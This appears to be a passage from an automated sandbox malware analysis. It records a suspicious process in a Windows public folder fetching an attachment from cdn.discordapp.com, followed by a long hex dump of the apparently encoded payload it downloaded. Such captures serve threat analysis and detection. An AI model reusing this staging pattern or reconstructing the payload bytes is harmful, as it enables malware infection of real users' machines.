                                Data Ascii: wUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ42}yJOuJwUUJw.y042}UUwJ.w.wuJ<uuii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s"uii$s"}}uii$s


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                3192.168.2.349751162.159.134.233443C:\Users\Public\Libraries\Eluiezilfw.exe
                                TimestampkBytes transferredDirectionData
                                2022-06-26 07:43:17 UTC605OUTGET /attachments/990482594137251863/990489253987360768/Eluiezilfwmdrgrdfrqpnwmurrnwnhm HTTP/1.1
                                User-Agent: 91
                                Host: cdn.discordapp.com
                                Cache-Control: no-cache
                                2022-06-26 07:43:17 UTC606INHTTP/1.1 200 OK
                                Date: Sun, 26 Jun 2022 07:43:17 GMT
                                Content-Type: application/octet-stream
                                Content-Length: 279040
                                Connection: close
                                CF-Ray: 72144fa56c9abbf8-FRA
                                Accept-Ranges: bytes
                                Age: 29
                                Cache-Control: public, max-age=31536000
                                Content-Disposition: attachment;%20filename=Eluiezilfwmdrgrdfrqpnwmurrnwnhm
                                ETag: "7d74af495b07aad93486870343b767e3"
                                Expires: Mon, 26 Jun 2023 07:43:17 GMT
                                Last-Modified: Sun, 26 Jun 2022 05:30:40 GMT
                                Vary: Accept-Encoding
                                CF-Cache-Status: HIT
                                Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                x-goog-generation: 1656221440589477
                                x-goog-hash: crc32c=Xt3y7g==
                                x-goog-hash: md5=fXSvSVsHqtk0hocDQ7dn4w==
                                x-goog-metageneration: 1
                                x-goog-storage-class: STANDARD
                                x-goog-stored-content-encoding: identity
                                x-goog-stored-content-length: 279040
                                X-GUploader-UploadID: ADPycdvxBSrtOJadICrFNKKLfO89NiJC2XolLUl9l7gh0iKGSgrZ72iFb7WGAL9LAxlO6pTzoCsdjuJYzhz5OOHW7aIxBA
                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bz2kShRpzLwKS4ZtLOj0Ms49yEh%2FSKUnFhePRt89dT9Cv%2B%2BkZk1W%2BVQkrY51uF7Zgn3%2FpfA7jRe8VrAjvkfAKxK9EMAgHz8q43XjQ4%2FST7fvXB2G4xAK5w%2BZ9zpdpo6M6n4jSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                2022-06-26 07:43:17 UTC607INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                2022-06-26 07:43:17 UTC607INData Raw: 28 7f b5 25 de 25 25 25 29 25 25 25 da da 25 25 dd 25 25 25 25 25 25 25 65 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 25 dc 25 25 33 fa df 33 25 d9 e4 a8 fc dd dc 71 a8 fc 79 8d 44 4e 45 95 97 4a 42 97 3c 48 45 3e 3c 93 93 4a 99 45 87 40 45 97 50 93 45 44 93 45 69 2a 2e 45 48 4a 89 40 53 e8 e8 2f 49 25 25 25 25 25 25 25 19 fb 3d ab d5 92 9b b0 d5 92 9b b0 d5 92 9b b0 0e 86 9d b0 92 92 9b b0 ba cd 58 b0 8e 92 9b b0 ba cd a1 b0 96 92 9b b0 ba cd 97 b0 d7 92 9b b0 63 9a 04 b0 90 92 9b b0 7d cd 58 b0 8e 92 9b b0 63 9a 3b b0 8c 92 9b b0 d5 92 52 b0 a5 db 9b b0 0e 9a 06 b0 7e 92 9b b0 ab 6c 58 b0 47 92 9b b0 ab 6c a1 b0 8c 92 9b b0 86 4f 01 b0 d9 92 9b b0 52 8c 95 b0 8c 92 9b b0 77 44 3e 8d d5 92 9b
                                Data Ascii: (%%%%)%%%%%%%%%%%%e%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%33%qyDNEJB<HE><JE@EPEDEi*.EHJ@S/I%%%%%%%=Xc}Xc;R~lXGlORwD>
                                2022-06-26 07:43:17 UTC608INData Raw: 59 65 25 ec 79 24 93 99 40 97 8b 3c 3e 40 89 2a 87 8f 40 3e 99 66 e5 da 00 b5 cc 1c 25 66 e5 da 00 b1 cc 1c 25 66 e5 da 00 ad cc 1c 25 66 e5 da 00 a9 cc 1c 25 66 e5 da 00 a5 cc 1c 25 66 e5 da 00 c9 cc 1c 25 66 e5 da 00 a1 cc 1c 25 66 e5 da 00 c5 cc 1c 25 66 e5 da 00 9d cc 1c 25 66 e5 da 00 99 cc 1c 25 66 e5 da 00 95 cc 1c 25 66 e5 da 00 91 cc 1c 25 66 e5 da 00 8d cc 1c 25 66 e5 da 00 89 cc 1c 25 66 e5 da 00 85 cc 1c 25 66 e5 da 00 81 cc 1c 25 66 e5 da 00 7d cc 1c 25 66 e5 da 00 79 cc 1c 25 66 e5 da 00 75 cc 1c 25 66 e5 da 00 c1 cc 1c 25 66 e5 da 00 71 cc 1c 25 66 e5 da 00 6d cc 1c 25 66 e5 da 00 69 cc 1c 25 66 e5 da 00 d9 cc 1c 25 66 e5 da 00 d5 cc 1c 25 66 e5 da 00 d1 cc 1c 25 66 e5 da 00 65 cc 1c 25 66 e5 da 00 61 cc 1c 25 66 e5 da 00 e9 cc 1c 25 66 e5
                                Data Ascii: Ye%y$@<>@*@>f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f}%fy%fu%f%fq%fm%fi%f%f%f%fe%fa%f%f
                                2022-06-26 07:43:17 UTC610INData Raw: 25 66 2b 66 65 2d 75 0d 3b 21 da da 60 e5 50 2f a2 e0 ed c0 1c 25 dc 25 25 25 66 2b 0d ec d8 da da 66 69 49 29 64 2b dd 11 c0 1c 25 16 2b 50 b1 0e e5 64 e2 5e a1 49 31 25 99 ec 66 69 49 2d 64 e2 66 69 49 31 06 69 49 2d 64 22 29 5e e9 3d 38 3a 83 36 9e 66 e5 2e 7b 32 30 5e e9 0d 66 b4 64 39 49 68 99 49 2d 68 a1 49 29 68 91 49 31 66 f5 66 ef 5c bc 25 15 da da 64 71 49 35 de 39 49 5c e7 da ea 25 25 5c 07 25 15 da da 64 79 49 39 66 69 49 35 64 de 66 69 49 39 06 69 49 35 64 1e 29 7c 11 c0 1c 25 64 e2 c6 36 66 e2 66 65 2d 64 2b 66 e2 66 65 31 de 2b 64 20 25 66 2b 16 69 49 35 4e 2b 66 69 49 35 64 2b 66 20 25 16 69 49 39 9b e2 66 69 49 39 64 20 25 66 2b 16 20 25 4e fa 8f 29 8d 25 35 25 25 66 20 25 06 2b 75 66 2b 75 0d 4b d6 da da 60 e5 50 2b 0e e5 64 de c6 ea 66
                                Data Ascii: %f+fe-u;!`P/%%%%f+fiI)d+%+Pd^I1%fiI-dfiI1iI-d")^=8:6f.{20^fd9IhI-hI)hI1ff\%dqI59I\%%\%dyI9fiI5dfiI9iI5d)|%d6ffe-d+ffe1+d %f+iI5N+fiI5d+f %iI9fiI9d %f+ %N)%5%%f %+uf+uK`P+df
                                2022-06-26 07:43:17 UTC611INData Raw: 0d f9 1b da da eb e0 e9 c0 1c 25 25 7c 49 0b 1c 25 75 0d c7 1b da da 0e e5 7e 49 0b 1c 25 7c 11 c0 1c 25 64 20 1d c6 f6 8d 25 a5 25 25 8f 25 66 20 1d 66 65 2d 75 0d b3 1b da da 66 20 1d 66 25 64 20 1d dd 11 c0 1c 25 16 20 1d 50 b6 dd 11 c0 1c 25 0d 43 d2 da da dd 21 c0 1c 25 0d 39 d2 da da dd 4d 0b 1c 25 0d 2f d2 da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 99 fc 66 20 21 66 25 7e 09 c0 1c 25 66 20 21 75 0d 08 1b da da 7c 09 c0 1c 25 64 20 21 5e 58 21 25 50 ba 0e e5 7f 34 34 89 64 35 8d b2 41 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 02 1b da da 8d f1 c0 1c 25 0d 00 1b da da 9e c4 8a 41 25 25 c6 b6 34 34 38 9e b5 2e 5e e9 1d 16 e0 3d 0b 1c 25 50 e4 66 75 29 64 f0 3d 0b 1c 25 66 75 29 64 39 49 66 75 2d 5c 1f 25 35 25 25 5a 73 16 29 49 50 f2 60 f7 54
                                Data Ascii: %%|I%u~I%|%d %%%%f fe-uf f%d % P%C!%9M%/|%d !^X!%f !f%~%f !u|%d !^X!%P44d5Ae%(%%/%%A%%448.^=%Pfu)d=%fu)d9Ifu-\%5%%Zs)IP`T
                                2022-06-26 07:43:17 UTC612INData Raw: 29 66 e2 7e 45 0b 1c 25 66 22 29 7e 41 0b 1c 25 d5 dc 5e e9 35 3a 83 36 9e 68 65 25 2e 5e e9 1d 66 fd 66 f9 68 1e 29 0d 19 1b da da 5e 61 49 25 99 e6 66 e9 0d 32 da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 36 9e b5 2e 7b 5e e9 1d 66 17 66 fd 66 f1 68 7b 29 66 9e 0d 46 d2 da da 5e 61 49 25 99 e6 66 e9 0d 4b da da da a9 e5 50 29 0e e5 c6 27 d5 dc 34 7f 83 36 9e 68 65 25 2c 66 f9 0e a4 64 2f 60 e5 54 de 5e e5 de 9c 1d 27 18 25 29 25 25 5a f4 66 e8 49 0b 1c 25 66 71 5c 19 64 2f 5e 5f 25 50 2d 65 18 dc 29 25 25 50 c2 66 27 7f 9e 68 65 25 2e 7b 32 30 5e e9 19 66 fd 68 99 49 2d 9a 3d 0b 1c 25 98 41 0b 1c 25 7c 35 0b 1c 25 64 2b 66 2b 16 7d 2d ea b3 86 25 25 25 66 e2 64 2b 66 2b 66 65 2d 16 fd ea b3 bf 25 25 25 66 3b 64 7f 2d 66 3b 66 77 29 64 3b 66 3b 16 7f 2d
                                Data Ascii: )f~E%f")~A%^5:6he%.^ffh)^aI%f2P)'46.{^fffh{)fF^aI%fKP)'46he%,fd/`T^'%)%%ZfI%fq\d/^_%P-e)%%Pf'he%.{20^fhI-=%A%|5%d+f+}-%%%fd+f+fe-%%%f;d-f;fw)d;f;-
                                2022-06-26 07:43:17 UTC614INData Raw: 65 25 a5 18 28 05 1c 25 25 99 2f 8d f1 c0 1c 25 0d 3f 11 da da 9e c4 d1 37 25 25 c6 c0 66 20 21 36 66 c0 38 9e 66 e5 2e 7b 32 30 5e e9 19 66 ff 5e 9e e2 5e be 21 5e d6 31 58 e0 96 31 25 25 25 5e 0d 29 64 29 49 66 29 49 66 55 5c 0b 21 da da 5a 66 29 49 de eb 64 69 49 29 16 ce 50 e2 d5 dc c4 98 dc 25 25 16 ce ea b3 b5 25 25 25 66 13 06 c6 66 79 49 29 16 f0 45 0b 1c 25 50 51 04 08 45 0b 1c 25 dc 08 41 0b 1c 25 5e 18 41 0b 1c 25 31 ea 68 4a dc 25 25 dc 08 45 0b 1c 25 04 08 41 0b 1c 25 66 03 c4 81 dc 25 25 64 69 49 29 66 69 49 29 1b 25 27 50 3d 66 69 49 29 64 69 49 2d 66 69 49 2d de 8d 2d 66 69 49 2d 0d 2c d0 da da 5e d8 31 a1 fe 66 29 49 de 9e 64 69 49 29 5e a8 27 66 69 49 29 64 4d 66 69 49 29 5e e5 29 0d 67 1b da da c4 ea dc 25 25 66 03 c4 2d dc 25 25 66 d6
                                Data Ascii: e%(%%/%?7%%f !6f8f.{20^f^^!^1X1%%%^)d)If)IfU\!Zf)IdiI)P%%%%%ffyI)E%PQE%A%^A%1hJ%%E%A%f%%diI)fiI)%'P=fiI)diI-fiI--fiI-,^1f)IdiI)^'fiI)dMfiI)^)g%%f-%%f
                                2022-06-26 07:43:17 UTC615INData Raw: 2b a5 5d 47 50 e8 66 2b a5 9d dc 47 50 e0 5e 2b 27 c6 ba 0e c8 66 2b 64 69 49 31 c6 36 66 2b a5 5d 47 50 65 66 2b 75 0d 7b c0 da da 64 2b c6 39 66 2b 75 0d 6f c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 ba 66 2b a5 5d 25 99 45 66 2b 75 0d 47 c0 da da 64 2b c6 39 66 2b 75 0d 3b c0 da da 64 e2 66 e2 06 2b de 0d 66 e2 64 2b 66 2b a5 5d 45 52 c3 66 69 49 29 66 b0 0d 9d f4 25 25 66 69 49 31 64 2b 66 69 49 29 66 25 64 69 49 35 0e c8 c6 56 66 2b a5 5d 47 50 75 66 2b 75 0d b0 09 da da 64 2b c6 49 66 2b 75 0d a4 09 da da 64 e2 66 2b 16 e2 4e 39 66 2b af 25 66 79 49 35 ad 29 4f da 2b 20 66 2b 16 e2 97 11 66 2b af 3d a9 b6 99 e0 a5 d6 47 50 aa 66 2b a5 5d 25 99 55 66 2b 75 0d 6c 09 da da 64 2b c6 49 66 2b 75 0d 60 09 da da 64 e2
                                Data Ascii: +]GPf+GP^+'f+diI16f+]GPef+u{d+9f+uodf+fd+f+=GPf+]%Ef+uGd+9f+u;df+fd+f+]ERfiI)f%%fiI1d+fiI)f%diI5Vf+]GPuf+ud+If+udf+N9f+%fyI5)O+ f+f+=GPf+]%Uf+uld+If+u`d
                                2022-06-26 07:43:17 UTC616INData Raw: 59 65 25 25 25 a0 53 e1 c7 8c 12 65 25 25 65 9b 5f 46 e6 03 5f 65 25 25 0d 64 29 fe a2 af 63 65 25 25 87 d1 a0 c6 9d 88 1c 65 25 a5 9f f2 92 4b b2 fd 69 65 25 b5 d1 93 57 9d ab 62 6d 65 25 d9 32 2f 1a 3b 8d 84 26 65 25 7c c8 f1 f3 f6 e7 ae 73 65 c5 a9 39 65 3c 2c 34 a9 77 65 ed 80 f4 b5 94 80 4a 80 30 65 5f ea 45 19 02 6a a6 f3 7d 65 a9 e4 b9 1d 9d 14 1a 5c 81 65 c0 e6 94 5b b2 e2 6a 7c 3a 65 ba 73 42 29 a8 a4 17 a4 87 65 bb 47 5c 20 65 a1 4a 21 40 65 c3 90 95 06 cd 88 a0 78 44 65 b0 cb aa da 24 fa 9d e7 ae 65 7e 39 76 a0 3b 86 8e ca 18 1c 05 b1 c4 a5 a4 22 df 6e cd 1c cf f2 0b 5a 06 7c 3b db 37 67 46 30 02 14 68 d2 95 05 a1 67 55 a4 61 be da bb 77 af c2 67 b3 03 d4 78 d6 c6 a3 cf 2c 1e b1 0a 8f 81 f4 21 4b f7 96 1e 9b be f1 17 04 0a a9 5c 4b 69 f7 2f b5
                                Data Ascii: Ye%%%Se%%e_F_e%%d)ce%%e%Kie%Wbme%2/;&e%|se9e<,4weJ0e_Ej}e\e[j|:esB)eG\ eJ!@exDe$e~9v;"nZ|;7gF0hgUawgx,!K\Ki/
                                2022-06-26 07:43:17 UTC618INData Raw: 7b 8b 66 57 8b e4 1b 99 f2 8b 5c 23 25 e5 4e 35 75 66 25 0d 9d da da da 7d 99 e0 64 cc 83 da bc 83 66 2d da 3c 15 9e b5 77 2c 2e a9 f7 a1 de da 75 19 0c f7 68 71 49 35 89 66 3f 64 f4 64 44 2d a2 1c 29 f4 12 65 25 64 1c 31 89 64 2f 36 34 7f 9e c4 5f dc 25 25 66 69 49 51 66 65 31 60 e5 99 33 66 2d d7 5c 75 da 2c 21 7d 0d e4 25 25 25 0d cd 27 25 25 9e 68 65 25 66 35 da 77 1d 9e 66 e5 2e 66 fd 66 9e 66 35 da 77 09 66 9e 36 9e 66 e5 a9 f7 5a dc 9e 75 77 66 35 da 77 0d 7f 7d 9e b5 a5 18 4d e5 1c 25 dc 9b ec 8f 25 8f 25 8f 25 8d ba 1f c8 33 da f0 39 05 1c 25 9e b5 a5 18 4d e5 1c 25 25 99 f2 75 75 77 79 8f 27 8f 25 8d 09 1f c8 33 da f0 39 05 1c 25 5e e9 2d 7d 9e 68 65 25 79 8f dc 8f 25 8d 05 1f c8 33 da f0 39 05 1c 25 5e e9 29 7d 9e 68 65 25 a5 18 4d e5 1c 25 dc
                                Data Ascii: {fW\#%N5uf%}df-<w,.uhqI5f?ddD-)e%d1d/64_%%fiIQfe1`3f-\u,!}%%%'%%he%f5wf.fff5wf6fZuwf5w}M%%%%39%M%%uuwy'%39%^-}he%y%39%^)}he%M%
                                2022-06-26 07:43:17 UTC619INData Raw: 65 29 64 20 21 0e e5 30 8d 38 61 65 25 89 da 55 89 64 45 60 b6 a3 f6 26 64 83 31 66 20 21 66 69 fd 29 64 20 1d 5e 58 1d 25 99 de da 30 1d 60 b6 5a c0 0e e5 7f 34 34 89 64 35 c6 39 c4 1b d6 da da 0d 7c da da da 0d 9d d8 da da 0d a2 d8 da da 3a 83 36 34 34 38 9e 30 66 11 5e e9 1d 2e 7b 32 9a 5d 0b 1c 25 66 22 2d 60 e5 99 79 66 55 0e b6 66 65 29 64 20 21 0e e5 30 8d a8 61 65 25 89 da 55 89 64 45 16 ce a3 3f 66 20 21 66 29 fd 64 20 1d 1e 64 3a 31 5e 58 1d 25 99 de da 30 1d 16 ce 5a 0b 0e e5 7f 34 34 89 64 35 c6 39 c4 ab d6 da da 0d 0c da da da 0d 2d d8 da da 0d 32 d8 da da 3a 83 36 34 34 38 9e 2c 7b 32 e3 5d 0b 1c 25 68 58 e9 94 e6 25 25 25 ce 80 6a e0 7d 0b 1c 25 6a e0 79 0b 1c 25 64 08 71 0b 1c 25 64 f8 75 0b 1c 25 7e 65 0b 1c 25 64 f0 6d 0b 1c 25 68 28 e9
                                Data Ascii: e)d !08ae%UdE`&d1f !fi)d ^X%0`Z44d59|:64480f^.{2]%f"-`yfUfe)d !0ae%UdE?f !f)d d:1^X%0Z44d59-2:6448,{2]%hX%%%j}%jy%dq%du%~e%dm%h(
                                2022-06-26 07:43:17 UTC620INData Raw: 0d 7c f5 da da 38 e7 29 25 b5 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a9 23 da da c6 3a 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da ea 25 25 0d a9 da da da 66 fd 60 b6 a1 ea 68 79 49 29 66 a2 66 a6 0d 1c da da da c6 51 66 b8 de b6 66 a2 66 ae 0d 57 29 25 25 7b 66 e2 66 71 49 29 66 ae 0d 79 da da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d ee 29 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 77 64 07 94 dc 25 25 25 0d d6 23 da da 7f 9e b5 0c a4 60 f7 99 fc 77 5f 2f 99 f2 5f 6f dc 99 ec 5f 6f 27 99 e6 5f 6f de 99 e0 5e e7 29 c6 0d 67 67 67 64 ac 7f 04 ac c4 f1 23 da da 9e 68 65 25 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29 99 33 8b 16 6f 2b 99 e0 5e e7 2d c6 09 5e e7 27 5e e7 27
                                Data Ascii: |8)%.{20\)u^!fd9If`Zf#:h\%%XM{hiI-fqI)%%f`hyI)ffQfffW)%%{ffqI)fyf`X'ff)%%\)5%%8:6wd%%%#`w_/_o_o'_o^)gggd#he%`w/Eo'o)3o+^-^'^'
                                2022-06-26 07:43:17 UTC622INData Raw: 25 25 25 75 0d a9 a6 da da 5e 9e 29 73 50 0d 83 36 9e 68 65 25 60 f7 ea a9 e1 da da da 66 6f 21 ac c4 ea a9 8c da da da 2c 77 75 0d 30 a6 da da 60 e5 ea a9 4c da da da 9e 2e 7b 32 30 5c e9 29 15 da da 75 5e e9 21 66 cc 64 39 49 66 1d 60 1b 5a e4 66 a2 0d a5 da da da c6 38 68 93 dc 5c d8 da e2 25 25 58 4d 7b 68 69 49 2d 66 71 49 29 df da e2 25 25 0d 41 1f da da 66 fd 60 b6 a3 ea 68 79 49 29 66 a2 66 a6 0d 14 25 25 25 c6 4f 66 b8 66 a2 66 ae 0d ad dc 25 25 7b 66 e2 66 71 49 29 66 ae 0d 13 d4 da da 66 fd 60 b6 58 27 0e b6 66 a2 66 ae 0d 44 dc 25 25 5c e9 29 35 25 25 38 3a 83 36 9e 66 e5 60 a4 ea a9 31 da da da 75 2c 77 0d cd ef da da 60 e5 ea a9 f1 23 da da 7f da 57 64 27 0d cb ef da da 9e b5 0c a4 60 f7 99 08 77 8b 16 2f 99 45 8b 16 6f 27 99 f2 8b 16 6f 29
                                Data Ascii: %%%u^)sP6he%`fo!,wu0`L.{20\)u^!fd9If`Zf8h\%%XM{hiI-fqI)%%Af`hyI)ff%%%Offf%%{ffqI)ff`X'ffD%%\)5%%8:6f`1u,w`#Wd'`w/Eo'o)
                                2022-06-26 07:43:17 UTC623INData Raw: da da da 2a 5a 0d 38 c6 57 30 64 b0 64 fd de 81 53 27 64 17 0d fa da da da 2a 5a 15 38 c6 41 66 de 5e 9e 29 0d 42 33 25 25 2a 5a ce c6 e8 66 de 5e 9e 29 0d 45 e2 25 25 2a 5a ce 3a 83 36 9e b5 5e 18 3d e5 1c 25 25 99 e2 da f0 3d e5 1c 25 9e d5 35 0d 60 03 da da 9e 2e 7b 32 30 64 9e 64 fb 0c e5 af 1c dc 68 a1 2d 2f 66 4a 21 0c e5 66 2a 1d 2c 66 2a 29 04 9c a3 e6 64 e7 dc 15 dc ff 0d 1d 03 da da 66 22 29 66 f2 66 37 af 2f a5 d4 2f 99 0c a5 d4 e6 99 18 a5 d4 31 99 24 a5 d4 e8 99 30 a5 d4 33 99 95 a5 d4 ea ea a9 a5 25 25 25 a5 d4 ec ea a9 ad 25 25 25 d5 27 38 3a 83 36 c4 f4 03 da da 66 39 55 dc fd 0d 5e ce da da dd 29 25 25 25 c6 58 66 39 55 dc fd 0d 03 d4 da da dd 29 25 25 25 c6 91 68 39 55 dc fd 0d 2c da da da dd 35 25 25 25 c6 36 0c a4 af 6f dc da 99 ec 27
                                Data Ascii: *Z8W0ddS'd*Z8Af^)B3%%*Zf^)E%%*Z:6^=%%=%5`.{20ddh-/fJ!f*,f*)df")ff7//1$03%%%%%%'8:6f9U^)%%%Xf9U)%%%h9U,5%%%6o'
                                2022-06-26 07:43:17 UTC624INData Raw: 66 3d 60 b6 5a f6 60 b6 58 e2 d5 29 0d 97 b4 da da 66 20 21 66 30 1d 0d 9a da da da c4 3e dc 25 25 0e da 5e 58 0d 25 99 e8 5e 48 0d 29 66 20 0d 66 5d 5e 48 0d 29 66 20 1d ea db 65 dc dc 20 1d 66 20 1d 66 95 27 66 75 2b 60 f7 99 e2 66 27 64 20 1d c6 e0 0e e5 64 20 1d 66 9e d2 13 64 20 11 66 20 11 74 d2 d6 16 15 99 e2 d5 29 0d 37 b4 da da 5e 20 11 2d 5e 58 0d 25 99 2d 66 20 0d 5e 5d dc 50 61 66 20 0d 64 20 09 16 d6 a3 fa 5e 58 1d 25 99 f4 66 20 0d 5e e5 2d 66 ae ea 8a fb de e7 66 aa 06 a6 66 30 1d 0d 02 da da da 68 20 09 66 30 11 0d ed b2 da da 66 20 09 64 20 0d c6 3e 66 20 0d da 2d 66 20 11 0d 3e b2 da da 64 20 0d 64 58 15 16 38 15 58 de 64 38 15 5e 58 1d 25 99 51 66 30 15 ea 8a fb 66 20 0d 5e e5 2d 0e a4 0d 65 01 da da 66 20 15 75 66 30 21 66 37 66 20 0d
                                Data Ascii: f=`Z`X)f !f0>%%^X%^H)f f]^H)f e f f'fu+`f'd d fd f t)7^ -^X%-f ^]Paf d ^X%f ^-fff0h f0f d >f -f >d dX8Xd8^X%Qf0f ^-ef uf0!f7f
                                2022-06-26 07:43:17 UTC626INData Raw: 0d e0 25 25 25 68 60 ba 23 da da df e0 dc 25 25 0d 5c d8 da da 68 20 0d 75 68 20 13 75 8f 25 8f 25 68 60 ba 23 da da 75 66 20 1d 75 0d 04 96 da da 60 e5 99 47 68 20 0d 75 68 20 13 75 8f 25 8f 25 8d f1 7d 65 25 66 20 1d 75 0d e6 96 da da 60 e5 99 29 eb 20 13 25 eb 20 17 25 0e e5 7f 34 34 89 64 35 8d 32 32 65 25 66 20 1d 75 0d b4 df da da 9e c4 0a 07 da da c6 ca 8d e0 dc 25 25 66 20 21 75 68 60 ba 23 da da 75 0d c9 df da da 8f e0 68 20 ce 75 8f de 0d 5a df da da 75 0d 2c df da da 0e b6 a5 98 ba 23 da da 25 ea a9 d4 25 25 25 a5 58 ce 25 50 2f a5 58 13 25 ea a9 c4 25 25 25 68 60 ba 23 da da 75 0d 93 df da da 68 70 ba 23 da da de e7 64 20 09 c6 de da 28 09 66 20 09 a5 5d 53 99 e6 68 60 ba 23 da da 16 20 09 50 0f 68 60 ba 23 da da 16 20 09 ea a9 86 25 25 25 da
                                Data Ascii: %%%h`#%%\h uh u%%h`#uf u`Gh uh u%%}e%f u`) % %44d522e%f u%%f !uh`#uh uZu,#%%%%X%P/X%%%%h`#uhp#d (f ]Sh`# Ph`# %%%
                                2022-06-26 07:43:17 UTC627INData Raw: 5e e9 15 2e 7b 64 28 19 64 30 1d 64 20 21 5e 58 19 25 50 2f 0e e5 64 20 15 c4 e4 dc 25 25 a2 20 15 da da da da 0e e5 0e 1b 5e 58 21 25 ea a9 84 25 25 25 c4 a7 25 25 25 66 30 19 0e a4 af 31 57 6b 1b 9c a5 99 91 16 50 2d ea 5e fd 25 25 25 5e bc 1a 1b 9c 45 99 53 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 96 25 25 25 16 50 2d ea 5e d7 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b e6 ac 66 ef 66 30 19 af 39 57 6b 66 ff a5 be e5 a5 d6 a5 ea 60 68 25 25 25 a5 07 1a 5c 07 da 25 25 25 9c bc 2b 8b e6 ac 66 28 21 8b 64 39 1c c6 e2 66 30 21 8b 64 31 67 65 16 50 2d 4e e4 16 20 1d ea a7 95 da da da 16 20 1d 97 29 66 20 1d 6d 66 30 21 8b a2 29 67 25 25 c6 22 16 50 2d 4e 67 66 30 19 af 39 57 6b 1b e7 a5 99 55 16 50 2d 4e 10 a5 07 1a 1b e7 45 99 39 66 30 19 af 39
                                Data Ascii: ^.{d(d0d !^X%P/d %% ^X!%%%%%%%f01WkP-^%%%^ESf09Wkf`%%%P-^%%%\%%%+ff09Wkf`h%%%\%%%+f(!d9f0!d1geP-N )f mf0!)g%%"P-Ngf09WkUP-NE9f09
                                2022-06-26 07:43:17 UTC628INData Raw: 7c c1 e5 1c 25 75 0d 68 da da da 7f 36 9e 66 e5 dd 31 25 25 25 60 e5 99 fa 0d 87 da da da 7e c1 e5 1c 25 0d bd da da da 7c c1 e5 1c 25 75 0d 38 da da da 7e 99 0b 1c 25 9e 68 65 25 2c dd 31 25 25 25 60 e5 99 4b 5e 18 c1 e5 1c 25 da 99 f8 7c c1 e5 1c 25 75 0d 5b da da da 64 29 49 5e 61 49 25 99 e4 66 29 49 75 0d 31 da da da 7f 9e 66 e5 dd 31 25 25 25 60 e5 99 f4 0d e3 da da da 5e 18 c1 e5 1c 25 da 99 e6 7c c1 e5 1c 25 75 0d 1b 23 da da 9e b5 af e8 89 0b 1c 25 7c c1 e5 1c 25 a9 a4 50 4b 89 66 f0 51 25 25 25 66 29 a7 9e 0d e8 da da da 7c c1 e5 1c 25 75 0d f7 23 da da 60 e5 99 dc 9e 7c 99 0b 1c 25 9e 75 0d 9c 23 da da 60 e5 99 b6 9e dd c5 e5 1c 25 0d 9b d2 da da 9e b5 df c5 e5 1c 25 5e 58 31 dc 50 4f 75 77 eb e0 89 0b 1c 25 dc 66 28 2d 64 e8 8d 0b 1c 25 64 6f
                                Data Ascii: |%uh6f1%%%`~%|%u8~%he%,1%%%`K^%|%u[d)I^aI%f)Iu1f1%%%`^%|%u#%|%PKfQ%%%f)|%u#`|%u#`%%^X1POuw%f(-d%do
                                2022-06-26 07:43:17 UTC630INData Raw: 1d 64 20 21 66 28 1d 1c 66 20 21 66 f0 25 35 65 25 0d 88 09 da da 66 20 19 0d ac b8 da da 0e e5 30 8d 9f 42 65 25 89 da 55 89 64 45 eb 20 ce 25 66 50 1d 6b 73 60 1b a1 55 6b 0e da 66 38 21 66 20 19 0d dd b8 da da 75 66 de 0d d5 b8 da da 75 0d 67 23 da da 60 e5 50 e4 66 20 2d 64 5d eb 20 ce dc 22 5e 9e 29 73 50 fb 0e e5 7f 34 34 89 64 35 8d 5c 42 65 25 68 20 19 0d 9c fd da da 66 20 21 66 28 1d 1c 66 f0 25 35 65 25 0d ce 07 da da 9e c4 e0 f7 da da c6 03 af 20 ce 66 58 09 66 50 0d 66 38 11 66 c0 38 e7 29 25 b5 0e f7 84 25 25 25 29 99 2b 5c ef 25 27 25 25 84 25 25 25 45 99 08 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 65 c6 1c 5e ef 45 c6 61 84 25 25 25 a5 99 2d 5c ef a5 25 25 25 c6 08 5e ef 35 66 e7 9e 84 25 25 25 65 99 ec 84 25 25 25 a5 99 e0 5e ef 29
